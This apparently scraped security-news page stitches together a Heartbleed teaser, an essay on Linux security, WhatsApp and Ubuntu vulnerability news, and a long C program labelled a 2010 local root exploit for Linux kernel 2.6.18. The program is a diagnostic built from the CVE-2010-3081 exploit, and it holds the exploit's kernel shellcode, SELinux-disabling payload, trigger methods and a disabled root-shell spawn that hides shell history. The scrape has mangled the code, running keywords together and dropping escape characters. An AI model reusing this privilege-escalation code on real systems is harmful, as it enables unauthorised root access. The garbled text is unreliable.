How to patch your server against The Heartbleed Bug
What is the Heartbleed Bug?
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library… rad more
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library… rad more
Sometimes websites have a security feature in place that protects the text of the website to prevent users from stealing site content. But websites aren’t around forever and sometimes ……read more
Linux use is growing at an amazing rate. This operating system, which has no public relations department, advertising, or government lobby, is being used widely in homes and server rooms alike. It’s also free, and 100% open source, meaning anyone can look at each and every line of code in the Linux kernel.
Linux is a true multiuser operating system, and has been since the very first version. It is powerful in it’s simplicity. Though there are robust graphical environments and tools, you can still do everything you could possibly need with just a keyboard and a shell prompt. Since you have the code, you could even make Linux do things it was never meant to.
That’s one of the things that draws both the gurus and the attackers alike.
The black-hats have thronged to Linux. It allows them the control they require to do strange and ingenious things. If they want to experiment with new or invalid network packets, they can do so easily without relying on undocumented (or non-existant) API support from the vendor.
Millions of lines of code have been written for Linux applications and libraries, usually in an extremely modular manner, which allows it to be integrated into widely diverse projects. For example a library that allows you to sniff the network for proactive performance monitoring could be used as part of network hijacking code.
The power and flexibility of Linux makes it the hacker’s playground. They use it, learn it, and understand it intimately. And that means that if there’s an insecurity, they’re going to find it.
However the very reasons the hackers like Linux are the same reasons more folks are installing it on their own systems today. The ability to look at each and every line of Linux code, and patch it when problems arise, means that Linux can be secured not just by a few programmers locked away in some corporate headquarters, but by any user at any time..
Kernel-2.6.18-164 2010 Local Root Exploit
Save this code as a c program file.
Code:
/*
kernel-2.6.18-164 2010 Local Root Exploit
=========================================
# Author: Hackeri-AL
# Email : h-al [at] hotmail [dot] it
# Group : UAH / United ALBANIA Hackers
# Web : uah1.org.uk
# Greetz: LoocK3D - b4cKd00r ~
--------------------------------------------
Diagnostic test for CVE-2010-3081 public exploit
Greg Price, Ksplice, Inc.
Tests whether the system has previously been exposed to the exploit
published as "hackerial.c" by Hackeri-AL on 2010 Sep 15. Based on the
original exploit code.
For more information, see
http://www.ksplice.com/uptrack/cve-2010-3081
Source: http://inj3ct0r.com/exploits/14333
*/#include<poll.h>#include<string.h>#include<unistd.h>#include<sys/types.h>#include<stdlib.h>#include<sys/wait.h>#include<sys/utsname.h>#include<sys/socket.h>#include<sched.h>#include<netinet/in.h>#include<stdio.h>#include<sys/stat.h>#include<fcntl.h>#include<sys/mman.h>#include<sys/ipc.h>#include<sys/msg.h>#include<sys/resource.h>#include<errno.h>#define _GNU_SOURCE
#define __dgdhdytrg55 unsignedint#define __yyrhdgdtfs66ytgetrfd unsignedlonglong#define __dhdyetgdfstreg__ memcpy
#define BANNER "Diagnostic tool forpublic CVE-2010-3081 exploit --Ksplice,Inc."
"(see http://www.ksplice.com/uptrack/cve-2010-3081)"
""#define KALLSYMS "/proc/kallsyms"#define TMAGIC_66TDFDRTS "/proc/timer_list"#define SELINUX_PATH "/selinux/enforce"#define RW_FOPS "timer_list_fops"#define PER_C_DHHDYDGTREM7765 "per_cpu__current_task"#define PREPARE_GGDTSGFSRFSD "prepare_creds"#define OVERRIDE_GGDTSGFSRFSD "override_creds"#define REVERT_DHDGTRRTEFDTD "revert_creds"#define Y0Y0SMAP 0x100000UL#define Y0Y0CMAP 0x200000UL#define Y0Y0STOP (Y0Y0SMAP+0xFFC)#define J0J0S 0x00200000UL#define J0J0R00T 0x002000F0UL#define PAGE_SIZE 0x1000#define KERN_DHHDYTMLADSFPYT 0x1#define KERN_DGGDYDTEGGETFDRLAK 0x2#define KERN_HHSYPPLORQTWGFD 0x4#define KERN_DIS_GGDYYTDFFACVFD_IDT 0x8#define KERN_DIS_DGDGHHYTTFSR34353_FOPS 0x10#define KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM 0x20#define KERN_DIS_GGSTEYGDTREFRET_SEL1NUX 0x40#define isRHHGDPPLADSF(ver)(strstr(ver,".el4")|| strstr(ver,".el5"))#define __gggdfstsgdt_dddex(f, a...)do{ fprintf(stdout, f,## a); } while(0)#define __pppp_tegddewyfg(s)do{ fprintf(stdout,"%s", s);}while(0)/* #define __print_verbose(s) do { fprintf(stdout, "%s", s); } while(0) */#define __print_verbose(s)do{}while(0)#define __xxxfdgftr_hshsgdt(s)do{ perror(s);exit(-1);}while(0)#define __yyy_tegdtfsrer(s)do{ fprintf(stderr, s);exit(-1);}while(0)staticchar buffer[1024];staticint s;staticint flags=0;volatilestaticsocklen_t magiclen=0;staticint useidt=1, usefops=0, uselsm=0;static __yyrhdgdtfs66ytgetrfd _m_fops=0,_m_cred[3]={0,0,0};static __dgdhdytrg55 _m_cpu_off=0;staticchar krelease[64];staticchar kversion[128];#define R0C_0FF 14staticchar ttrg0ccc[]="x51x57x53x56x48x31xc9x48x89xf8x48x31xf6xbex41x41x41x41"
"x3bx30x75x1fx3bx70x04x75x1ax3bx70x08x75x15x3bx70x0c"
"x75x10x48x31xdbx89x18x89x58x04x89x58x08x89x58x0cxebx11"
"x48xffxc0x48xffxc1x48x81xf9x4cx04x00x00x74x02"
"xebxccx5ex5bx5fx59xc3";
#define R0YTTTTUHLFSTT_OFF1 5#define R0YGGSFDARTDF_DHDYTEGRDFD_D 21#define R0TDGFSRSLLSJ_SHSYSTGD 45char r1ngrrrrrrr[]="x53x52x57x48xbbx41x41x41x41x41x41x41x41xffxd3"
"x50x48x89xc7x48xbbx42x42x42x42x42x42x42x42"
"xffxd3x48x31xd2x89x50x04x89x50x14x48x89xc7"
"x48xbbx43x43x43x43x43x43x43x43"
"xffxd3x5fx5fx5ax5bxc3";
#define RJMPDDTGR_OFF 13#define RJMPDDTGR_DHDYTGSCAVSF 7#define RJMPDDTGR_GDTDGTSFRDFT 25staticchar ttrfd0[]="x57x50x65x48x8bx3cx25x00x00x00x00""x48xb8x41x41x41x41x41x41x41x41xffxd0"
"x58x5f""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""xc3";/* implement selinux bypass for IDT ! */#define RJMPDDTGR_OFF_IDT 14#define RJMPDDTGR_DYHHTSFDARE 8#define RJMPDDTGR_DHDYSGTSFDRTAC_SE 27staticchar ruujhdbgatrfe345[]="x0fx01xf8x65x48x8bx3cx25x00x00x00x00"
"x48xb8x41x41x41x41x41x41x41x41xffxd0"
"x0fx01xf8""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x90x90x90x90x90x90x90x90x90x90""x48xcf";
#define CJE_4554TFFDTRMAJHD_OFF 10#define RJMPDDTGR_AYYYDGTREFCCV7761_OF 23staticchar dis4blens4sel1nuxhayettgdr64545[]="x41x52x50""xb8x00x00x00x00""x49xbax41x41x41x41x41x41x41x41""x41x89x02""x49xbax42x42x42x42x42x42x42x42""x41x89x02""x58x41x5a";
/* rhel LSM stuffs */#define RHEL_LSM_OFF 98struct LSM_rhel
{
__yyrhdgdtfs66ytgetrfd selinux_ops;
__yyrhdgdtfs66ytgetrfd capability_ops;
__yyrhdgdtfs66ytgetrfd dummy_security_ops;
__yyrhdgdtfs66ytgetrfd selinux_enforcing;
__yyrhdgdtfs66ytgetrfd audit_enabled;
constchar*krelease;
constchar*kversion;};struct LSM_rhel known_targets[4]={
{
0xffffffff8031e600ULL,
0xffffffff8031fec0ULL,
0xffffffff804acc00ULL,
0xffffffff804af960ULL,
0xffffffff8049b124ULL,
"2.6.18-164.el5",
"#1 SMP ThuSep303:28:30 EDT 2009" // to manage minor/bug fix changes
},
{
0xffffffff8031f600ULL,
0xffffffff80320ec0ULL,
0xffffffff804afc00ULL,
0xffffffff804b2960ULL,
0xffffffff8049e124ULL,
"2.6.18-164.11.1.el5",
"#1 SMP WedJan613:26:04 EST 2010"
},
{
0xffffffff805296a0ULL,
0xffffffff8052af60ULL,
0xffffffff806db1e0ULL,
0xffffffff806ddf40ULL,
0xffffffff806d5324ULL,
"2.6.18-164.11.1.el5xen",
"#1 SMP WedJan2008:06:04 EST 2010" // default xen
},
{
0xffffffff8031f600ULL,// d selinux_ops
0xffffffff80320ec0ULL,// d capability_ops
0xffffffff804afc00ULL,// B dummy_security_ops
0xffffffff804b2960ULL,// B selinux_enforcing
0xffffffff8049e124ULL,// B audit_enabled
"2.6.18-164.11.1.el5",
"#1 SMP WedJan2007:32:21 EST 2010"// tripwire target LoL
}};staticstruct LSM_rhel *curr_target=NULL, dyn4nt4n1labeggeyrthryt;staticint isSelinuxEnabled(){
FILE *selinux_f;
selinux_f = fopen(SELINUX_PATH,"r");
if(selinux_f == NULL)
{
if(errno == EPERM)
return1;
else
return0;
}
fclose(selinux_f);
return1;}staticint wtfyourunhere_heee(char*out_release,char* out_version){
int ret;constchar*ptr;
int count=0;
char r[32],*bptr;
struct utsname buf;
ret = uname(&buf);
if(ret <0)
return-1;
strcpy(out_release, buf.release);
strcpy(out_version, buf.version);
ptr = buf.release;
bptr = r;
memset(r,0x00,sizeof(r));
while(*ptr)
{
if(count ==2)
{
if(*ptr >='0'&&*ptr <='9')
*bptr++=*ptr;
else
break;
}
if(*ptr =='.')
count++;
ptr++;
}
if(strlen(r)<1||!atoi(r))
return-1;
return atoi(r);}staticvoid p4tch_sel1nux_codztegfaddczda(struct LSM_rhel *table){
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + CJE_4554TFFDTRMAJHD_OFF))= table->selinux_enforcing;
*((__yyrhdgdtfs66ytgetrfd *)(dis4blens4sel1nuxhayettgdr64545 + RJMPDDTGR_AYYYDGTREFCCV7761_OF))= table->audit_enabled;
__dhdyetgdfstreg__(ttrfd0 + RJMPDDTGR_GDTDGTSFRDFT, dis4blens4sel1nuxhayettgdr64545,sizeof(dis4blens4sel1nuxhayettgdr64545)-1);
__dhdyetgdfstreg__(ruujhdbgatrfe345 + RJMPDDTGR_DHDYSGTSFDRTAC_SE, dis4blens4sel1nuxhayettgdr64545,sizeof(dis4blens4sel1nuxhayettgdr64545)-1);}static __yyrhdgdtfs66ytgetrfd get_sym_ex(constchar* s,constchar* filename,int ignore_flag){
FILE *ka;
char line[512];
char reloc_a[64];
char reloc[64];
if(!(flags & KERN_HHSYPPLORQTWGFD)&&!ignore_flag)
return0;
ka = fopen(filename,"r");
if(!ka)
return0;
while(fgets(line,512, ka)!= NULL)
{
char*l_p = line;
char*ra_p = reloc_a;
char*r_p = reloc;
memset(reloc,0x00,sizeof(reloc));
memset(reloc_a,0x00,sizeof(reloc_a));
while(*l_p !=''&&(ra_p - reloc_a) <64)
*ra_p++=*l_p++;
l_p +=3;
while(*l_p !=''&&*l_p !=''&&*l_p !=' '&&(r_p - reloc)<64)
*r_p++=*l_p++;
if(!strcmp(reloc, s))
{
return strtoull(reloc_a, NULL,16);
}
}
return0;}staticinline __yyrhdgdtfs66ytgetrfd get_sym(constchar* s){
return get_sym_ex(s, KALLSYMS,0);}staticint parse_cred(constchar* val){
int i=0;
constchar* p = val;
charlocal[64],*l;
for(i=0; i<3; i++)
{
memset(local,0x00,sizeof(local));
l =local;
while(*p &&*p !=',')
*l++=*p++;
if(!(*p)&& i !=2)
return-1;
_m_cred[i]= strtoull(local, NULL,16);
p++;
}
return0;}#define SELINUX_OPS "selinux_ops"#define DUMMY_SECURITY_OPS "dummy_security_ops"#define CAPABILITY_OPS "capability_ops"#define SELINUX_ENFORCING "selinux_enforcing"#define AUDIT_ENABLED "audit_enabled"struct LSM_rhel *lsm_rhel_find_target(int check_rhel){
int i;
char mapbuf[128];
struct LSM_rhel *lsm =&(known_targets[0]);
if(check_rhel &&!isRHHGDPPLADSF(krelease))
{
__pppp_tegddewyfg("!!!Not a RHEL kernel, will skip LSM method
");
return NULL;
}
__print_verbose("$$$ Lookingfor known RHEL kernels..");
for(i=0; i<sizeof(known_targets)/sizeof(struct LSM_rhel); i++, lsm++)
{
if(!strcmp(krelease, lsm->krelease)&&!strcmp(kversion, lsm->kversion))
{
__gggdfstsgdt_dddex("$$$ Known target kernel:%s %s
", lsm->krelease, lsm->kversion);
return lsm;
}
}
__print_verbose("$$$ Locating symbols fornew target...");
strcpy(mapbuf,"/boot/System.map-");
strcat(mapbuf, krelease);
dyn4nt4n1labeggeyrthryt.selinux_ops = get_sym_ex(SELINUX_OPS, mapbuf,1);
dyn4nt4n1labeggeyrthryt.dummy_security_ops = get_sym_ex(DUMMY_SECURITY_OPS, mapbuf,1);
dyn4nt4n1labeggeyrthryt.capability_ops = get_sym_ex(CAPABILITY_OPS, mapbuf,1);
dyn4nt4n1labeggeyrthryt.selinux_enforcing = get_sym_ex(SELINUX_ENFORCING, mapbuf,1);
dyn4nt4n1labeggeyrthryt.audit_enabled = get_sym_ex(AUDIT_ENABLED, mapbuf,1);
if(!dyn4nt4n1labeggeyrthryt.selinux_ops ||
!dyn4nt4n1labeggeyrthryt.dummy_security_ops ||
!dyn4nt4n1labeggeyrthryt.capability_ops ||
!dyn4nt4n1labeggeyrthryt.selinux_enforcing ||
!dyn4nt4n1labeggeyrthryt.audit_enabled)
return NULL;
return&dyn4nt4n1labeggeyrthryt;}void error_no_symbol(constchar*symbol){
fprintf(stderr,
"!!!Couldnot find symbol:%s
"
""
"A symbol required by the published exploit for CVE-2010-3081isnot"
"provided by your kernel. The exploit would not work on your system.",
symbol);
exit(-1);}staticvoid put_your_hands_up_hooker(int argc,char*argv[]){
int fd,ver,ret;
char __b[16];
fd = open(KALLSYMS, O_RDONLY);
ret = read(fd, __b,16);// dummy read
if((fd >=0&& ret >0))
{
__print_verbose("$$$ can read /proc/kallsyms, will usefor convenience
");// d0nt p4tch m3 br0
flags |= KERN_HHSYPPLORQTWGFD;
}
close(fd);
ver = wtfyourunhere_heee(krelease, kversion);
if(ver <0)
__yyy_tegdtfsrer("!!! uname failed
");
__gggdfstsgdt_dddex("$$$ Kernel release:%s
", krelease);
if(argc !=1)
{
while((ret = getopt(argc, argv,"sflc:k:o:"))>0)
{
switch(ret)
{
case'f':
flags |= KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM|KERN_DIS_GGDYYTDFFACVFD_IDT;
break;
case'l':
flags |= KERN_DIS_GGDYYTDFFACVFD_IDT|KERN_DIS_DGDGHHYTTFSR34353_FOPS;
break;
case'c':
if(!optarg || parse_cred(optarg)<0)
__yyy_tegdtfsrer("!!!Unable to parse cred codes
");
break;
case'k':
if(optarg)
_m_fops = strtoull(optarg, NULL,16);
else
__yyy_tegdtfsrer("!!!Unable to parse fops numbers
");
break;
case's':
if(!isSelinuxEnabled())
__pppp_tegddewyfg("???-s ignored:SELinuxnot enabled
");
else
flags |= KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
break;
case'o':
if(optarg)
_m_cpu_off = strtoull(optarg, NULL,16);
else
__yyy_tegdtfsrer("!!!Unable to parse cpu_off numbers
");
break;
}
}
}
if(ver >=29)// needs cred structure
{
flags |= KERN_DGGDYDTEGGETFDRLAK;
if(!_m_cred[0]||!_m_cred[1]||!_m_cred[2])
{
_m_cred[0]= get_sym(PREPARE_GGDTSGFSRFSD);
_m_cred[1]= get_sym(OVERRIDE_GGDTSGFSRFSD);
_m_cred[2]= get_sym(REVERT_DHDGTRRTEFDTD);
}
if(!_m_cred[0])
error_no_symbol("prepare_creds");
if(!_m_cred[1])
error_no_symbol("override_creds");
if(!_m_cred[2])
error_no_symbol("revert_creds");
__print_verbose("$$$ Kernel credentials detected
");
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YTTTTUHLFSTT_OFF1))= _m_cred[0];
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0YGGSFDARTDF_DHDYTEGRDFD_D))= _m_cred[1];
*((__yyrhdgdtfs66ytgetrfd *)(r1ngrrrrrrr + R0TDGFSRSLLSJ_SHSYSTGD))= _m_cred[2];
}
if(ver >=30) // needs cpu offset
{
flags |= KERN_DHHDYTMLADSFPYT;
if(!_m_cpu_off)
_m_cpu_off =(__dgdhdytrg55)get_sym(PER_C_DHHDYDGTREM7765);
if(!_m_cpu_off)
error_no_symbol("per_cpu__current_task");
__print_verbose("$$$ Kernel per_cpu relocs enabled
");
*((__dgdhdytrg55 *)(ttrfd0 + RJMPDDTGR_DHDYTGSCAVSF))= _m_cpu_off;
*((__dgdhdytrg55 *)(ruujhdbgatrfe345 + RJMPDDTGR_DYHHTSFDARE))= _m_cpu_off;
}}staticvoid env_prepare(int argc,char* argv[]){
put_your_hands_up_hooker(argc, argv);
if(!(flags & KERN_DIS_DGDGHHYTTFSR34353_FOPS)) // try fops
{
__print_verbose("???Trying the timer_list_fops method
");
if(!_m_fops)
_m_fops = get_sym(RW_FOPS);
/* TODO: do RW check for newer -mm kernels which has timer_list_struct RO
* Thanks to the guy who killed this vector... you know who you are:)
* Lucky for you, there are more:)
*/
if(_m_fops)
{
usefops=1;
}
}
if(!(flags & KERN_DIS_GGDHHDYQEEWR4432PPOI_LSM))// try lsm(rhel)
{
__print_verbose("???Trying the LSM method
");
curr_target = lsm_rhel_find_target(1);
if(!curr_target)
{
__print_verbose("!!!Unable to find target for LSM method
");
}
else{
uselsm=1;
}
}
if(useidt &&(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
{
// -i flag
curr_target = lsm_rhel_find_target(0);
if(!curr_target)
{
__pppp_tegddewyfg("!!!Unable to find target:continue without SELinux disabled
");
/* remove Selinux Flag */
flags &=~KERN_DIS_GGSTEYGDTREFRET_SEL1NUX;
}
}
if(!usefops &&!useidt &&!uselsm)
__yyy_tegdtfsrer("!!!All exploit methods failed.");
}staticinlineint get_socklen(__yyrhdgdtfs66ytgetrfd addr, __dgdhdytrg55 stack){
int socklen_l =8+ stack - addr -16;
return socklen_l;}staticvoid __setmcbuffer(__dgdhdytrg55 value){
int i;
__dgdhdytrg55 *p =(__dgdhdytrg55*)buffer;
for(i=0; i<sizeof(buffer)/sizeof(void*); i++)
*(p+i)= value;}staticvoid y0y0stack(){
void* map = mmap((void*)Y0Y0SMAP,
PAGE_SIZE,
PROT_READ|PROT_WRITE,
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,
-1,0);
if(MAP_FAILED == map)
__xxxfdgftr_hshsgdt("mmap");}staticvoid y0y0code(){
void* map = mmap((void*)Y0Y0CMAP,
PAGE_SIZE,#ifdef TRY_REMAP_DEFAULT
PROT_READ|PROT_WRITE,#else
PROT_READ|PROT_WRITE|PROT_EXEC,#endif
MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,
-1,0);
if(MAP_FAILED == map)
__xxxfdgftr_hshsgdt("mmap");}staticint rey0y0code(unsignedlong old){
int fd;
void*map;
volatilechar wizard;
char cwd[1024];
getcwd(cwd,sizeof(cwd));
strcat(cwd,"/__tmpfile");
unlink(cwd);
fd = open(cwd, O_RDWR|O_CREAT, S_IRWXU);
if(fd <0)
return-1;
write(fd,(constvoid*)old, PAGE_SIZE);
if(munmap((void*)old, PAGE_SIZE)<0)
return-1;
map = mmap((void*)old,
PAGE_SIZE,
PROT_READ|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED,
fd,0);
if(map == MAP_FAILED)
return-1;
/* avoid lazy page fault handler
* Triple Fault when using idt vector
* and no pages are already mapped:)
*/
wizard =*((char*)old);
unlink(cwd);
return wizard;}void finish_shellcode(){
/* set shellcode level 2 */
if(flags & KERN_DGGDYDTEGGETFDRLAK)
{
__print_verbose("$$$ Using cred shellcode
");
__dhdyetgdfstreg__((void*)J0J0R00T, r1ngrrrrrrr,sizeof(r1ngrrrrrrr));
}
else
{
__print_verbose("$$$ Using standard shellcode
");
__dhdyetgdfstreg__((void*)J0J0R00T, ttrg0ccc,sizeof(ttrg0ccc));
*((unsignedint*)(J0J0R00T + R0C_0FF))= getuid();
}#ifdef TRY_REMAP_DEFAULT
if(rey0y0code(Y0Y0CMAP)<0)
__yyy_tegdtfsrer("!!!Unable to remap
");#endif}int method_idt_main(){
__yyrhdgdtfs66ytgetrfd *patch;
__print_verbose("$$$ Building shellcode - IDT method
");
patch =(__yyrhdgdtfs66ytgetrfd*)(ruujhdbgatrfe345 + RJMPDDTGR_OFF_IDT);
*patch =(__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
if(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX)
{
__print_verbose("$$$ including code to disable SELinux");
p4tch_sel1nux_codztegfaddczda(curr_target);
}
__dhdyetgdfstreg__((void*)J0J0S, ruujhdbgatrfe345,sizeof(ruujhdbgatrfe345));
finish_shellcode();
asmvolatile("int $0xdd
");
return(getuid()==0);}int method_idt(){
/* method_idt_main() crashes if no backdoor is present, so protect ourselves */
int pid;
pid = fork();
if(pid <0){
__xxxfdgftr_hshsgdt("!!! fork() failed");
return0;// error
}
if(pid ==0){
int r;
struct rlimit rlim ={0,0};
setrlimit(RLIMIT_CORE,&rlim);
r = method_idt_main();
exit(r ?0:1);
}
int status;
waitpid(pid,&status,0);
if(status ==0)
return method_idt_main();
else
return0;}void prepare_fops_lsm_shellcode(){
__yyrhdgdtfs66ytgetrfd *patch;
__print_verbose("$$$ Building shellcode - fops/LSM method
");
patch =(__yyrhdgdtfs66ytgetrfd*)(ttrfd0 + RJMPDDTGR_OFF);
*patch =(__yyrhdgdtfs66ytgetrfd)(J0J0R00T);
__setmcbuffer(J0J0S);
if(uselsm &&(flags & KERN_DIS_GGSTEYGDTREFRET_SEL1NUX))
{
__print_verbose("$$$ including code to disable SELinux");
p4tch_sel1nux_codztegfaddczda(curr_target);
}
__dhdyetgdfstreg__((void*)J0J0S, ttrfd0,sizeof(ttrfd0));
finish_shellcode();}int method_fops(){
int fd;
struct pollfd pfd;
prepare_fops_lsm_shellcode();
fd = open(TMAGIC_66TDFDRTS, O_RDONLY);
if(fd <0)
__xxxfdgftr_hshsgdt("!!! could not open /proc/timer_list");
pfd.fd = fd;
pfd.events = POLLIN | POLLOUT;
poll(&pfd,1,0);
return(getuid()==0);}int method_lsm(){
int msqid;
prepare_fops_lsm_shellcode();
msqid = msgget(0, IPC_PRIVATE|0600);
if(msqid <0)
__xxxfdgftr_hshsgdt("!!! msgget() failed");
msgctl(msqid, IPC_RMID,(struct msqid_ds *) NULL);// exploit it
return(getuid()==0);}int main(int argc,char*argv[]){
intdone;
printf(BANNER);
if(getuid()==0){
fprintf(stderr,"!!!Must run as non-root.");
return1;
}
env_prepare(argc, argv);
y0y0stack();
y0y0code();
done=0;
__pppp_tegddewyfg("$$$ Backdoorin LSM (1/3):");
if(uselsm){
__pppp_tegddewyfg("checking...");
done= method_lsm();
if(done)
__pppp_tegddewyfg("PRESENT
");
else
__pppp_tegddewyfg("not present.");
}else{
__pppp_tegddewyfg("not available.");
}
if(!done){
__pppp_tegddewyfg("$$$ Backdoorin timer_list_fops (2/3):");
if(usefops){
__pppp_tegddewyfg("checking...");
done= method_fops();
if(done)
__pppp_tegddewyfg("PRESENT
");
else
__pppp_tegddewyfg("not present.");
}else{
__pppp_tegddewyfg("not available.");
}
}
if(!done){
__pppp_tegddewyfg("$$$ Backdoorin IDT (3/3):");
if(useidt){
__pppp_tegddewyfg("checking...");
fflush(stdout);
done= method_idt();
if(done)
__pppp_tegddewyfg("PRESENT
");
else
__pppp_tegddewyfg("not present.");
}else{
__pppp_tegddewyfg("NOT CHECKING
");
}
}
munmap((void*)Y0Y0CMAP, PAGE_SIZE);
/* exec */
if(getuid()==0)
{
pid_t pid;
printf(""
"Yourin-memory kernel HAS A BACKDOOR that may have been left
"
"by the published exploit for CVE-2010-3081."
""
"More information is available at
"
" http://www.ksplice.com/uptrack/cve-2010-3081"
);
if(0){
/* spawn root shell as demonstration */
pid = fork();
if(pid ==0)
{
char*args[]={"/bin/sh","-i", NULL};
char*envp[]={"TERM=linux","BASH_HISTORY=/dev/null","HISTORY=/dev/null","history=/dev/null","HISTFILE=/dev/null","HISTFILESIZE=0",
"PATH=/bin:/sbin:/usr/sbin:/usr/bin:/usr/local/bin:/usr/local/sbin", NULL };
execve("/bin/sh", args, envp);
}
else
{
int status;
waitpid(pid,&status,0);
}
}
}
else{
printf(""
"Your system is free from the backdoors that would be left in memory
"
"by the published exploit for CVE-2010-3081.");
}
close(s);
return0;}
A security consultant has uncovered a security hole in WhatsApp, the instant messaging platform recently acquired by Facebook. The flaw can be leveraged to gain access to the private chats of Android device owners.
Many people are concerned with the privacy implications that come with Facebook’s acquisition of WhatsApp. However, as Bas Bosschert, the man who identified the vulnerability, highlights, Facebook didn’t need to buy the company if all it wanted to do was read users’ chats.
The expert has found that any Android app that’s allowed access to the SD card installed on the device can easily access private conversations.
All chats are saved in a database file (msgstore.db) that’s stored on the SD card. Bosschert has developed aproof-of-concept which demonstrates that any app that’s granted permission to access the card can easily retrieve the database and upload it to a remote server.
According to Bosschert, in newer versions of WhatsApp, the database file is encrypted. However, this doesn’t mean that users’ private chats are secure. It simply means that an attacker would have to decrypt the database file to gain access to its contents.
The decryption key can be found in WhatsApp Xtract, an app that allows users to create backups of WhatsApp conversations.
The POC developed by the expert is designed so that when the database is retrieved, the victim only sees a simple loading screen. Cybercriminals could combine the data-stealing code with a popular application to harvest a large number of databases.
In February, security researchers from Praetorian revealed finding a number of SSL-related vulnerabilities in WhatsApp. Most of them were fixed almost immediately by the company.
Source: Softpedia
A security issue affects Ubuntu 13.10 releases of Ubuntu and its derivatives
Saran Neti reported a flaw in the ipv6 UDP Fragmentation Offload (UFI) in the Linux kernel. A remote attacker could exploit this flaw to cause a denial of service (panic). (
)
Mathy Vanhoef discovered an error in the the way the ath9k driver was handling the BSSID masking. A remote attacker could exploit this error to discover the original MAC address after a spoofing attack. (
)
Andrew Honig reported a flaw in the Linux Kernel’s kvm_vm_ioctl_create_vcpu function of the Kernel Virtual Machine (KVM) subsystem. A local user could exploit this flaw to gain privileges on the host machine. (
) Various other issues were also addressed.
Andrew Honig reported a flaw in the apic_get_tmcct function of the Kernel Virtual Machine (KVM) subsystem if the Linux kernel. A guest OS user could exploit this flaw to cause a denial of service or host OS system crash. (
)
Andrew Honig reported an error in the Linux Kernel’s Kernel Virtual Machine (KVM) VAPIC synchronization operation. A local user could exploit this flaw to gain privileges or cause a denial of service (system crash).
Source:Ubuntu
refrence hackerschronicle